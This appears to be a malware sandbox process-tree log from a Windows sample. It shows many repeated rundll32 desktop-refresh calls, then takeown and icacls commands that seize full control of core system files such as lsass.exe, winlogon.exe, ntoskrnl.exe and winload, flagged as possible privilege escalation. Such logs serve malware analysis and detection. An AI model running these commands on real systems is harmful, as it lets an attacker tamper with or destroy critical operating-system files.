C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:892
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2932
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3068
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2840
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2236
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:884
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2808
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2228
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1152
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1720
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2684
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1676
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2496
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3016
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2608
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2568
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2436
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2708
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2576
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2216
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2272
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2468
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2492
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2428
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2928
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2900
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:324
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1168
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1620
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2344
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1348
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1920
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2168
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1808
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1508
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1412
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1244
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2132
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1712
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2148
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2068
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1524
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1608
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2984
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3004
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2104
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2276
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1544
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1812
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1296
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:956
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2980
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1696
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1664
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2172
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2836
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1892
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1604
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2388
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1628
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1584
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2288
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2308
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2372
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2672
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2572
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2556
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2804
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2660
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2924
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2440
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2424
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2416
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2536
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:528
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3048
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2352
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2336
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:596
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2688
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2716
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1092
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1224
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2880
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2728
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2088
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2816
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1476
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:3032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2008
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1984
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2128
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1708
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:740
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1696
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1200
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2172
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1016
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:848
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2076
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:900
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1740
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2112
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1116
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2952
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3008
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2516
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2700
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2444
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2432
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2488
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2484
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:528
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1532
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\smss.exe && icacls C:\Windows\System32\smss.exe /grant "%username%:F" && exit2⤵PID:1732
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\smss.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2832
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\smss.exe /grant "Admin:F"3⤵PID:2132
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\csrss.exe && icacls C:\Windows\System32\csrss.exe /grant "%username%:F" && exit2⤵PID:1008
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\csrss.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1972
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\csrss.exe /grant "Admin:F"3⤵PID:3032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\wininit.exe && icacls C:\Windows\System32\wininit.exe /grant "%username%:F" && exit2⤵PID:2252
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\wininit.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1468
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\wininit.exe /grant "Admin:F"3⤵PID:1012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant "%username%:F" && exit2⤵PID:2748
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\LogonUI.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:936
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\LogonUI.exe /grant "Admin:F"3⤵PID:1032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\lsass.exe && icacls C:\Windows\System32\lsass.exe /grant "%username%:F" && exit2⤵PID:1708
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\lsass.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2012
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\lsass.exe /grant "Admin:F"3⤵PID:1892
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\services.exe && icacls C:\Windows\System32\services.exe /grant "%username%:F" && exit2⤵PID:3052
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\services.exe3⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:2560
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\services.exe /grant "Admin:F"3⤵PID:2604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winlogon.exe && icacls C:\Windows\System32\winlogon.exe /grant "%username%:F" && exit2⤵PID:1236
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\winlogon.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2876
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\winlogon.exe /grant "Admin:F"3⤵PID:2620
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winload.efi && icacls C:\Windows\System32\winload.efi /grant "%username%:F" && exit2⤵PID:2864
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\winload.efi3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2136
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\winload.efi /grant "Admin:F"3⤵PID:2444
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winload.exe && icacls C:\Windows\System32\winload.exe /grant "%username%:F" && exit2⤵PID:2256
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\winload.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2924
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\winload.exe /grant "Admin:F"3⤵PID:2888
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\ntoskrnl.exe && icacls C:\Windows\System32\ntoskrnl.exe /grant "%username%:F" && exit2⤵PID:1588
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\ntoskrnl.exe3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2480
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\ntoskrnl.exe /grant "Admin:F"3⤵PID:592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\svchost.exe && icacls C:\Windows\System32\svchost.exe /grant "%username%:F" && exit2⤵PID:2684
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\svchost.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2224
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\svchost.exe /grant "Admin:F"3⤵PID:1428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\smss.exe && icacls C:\Windows\SysWOW64\smss.exe /grant "%username%:F" && exit2⤵PID:2552
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\smss.exe3⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:2364
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\csrss.exe && icacls C:\Windows\SysWOW64\csrss.exe /grant "%username%:F" && exit2⤵PID:1748
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\csrss.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2116
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\wininit.exe && icacls C:\Windows\SysWOW64\wininit.exe /grant "%username%:F" && exit2⤵PID:2860
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\wininit.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:704
-
-
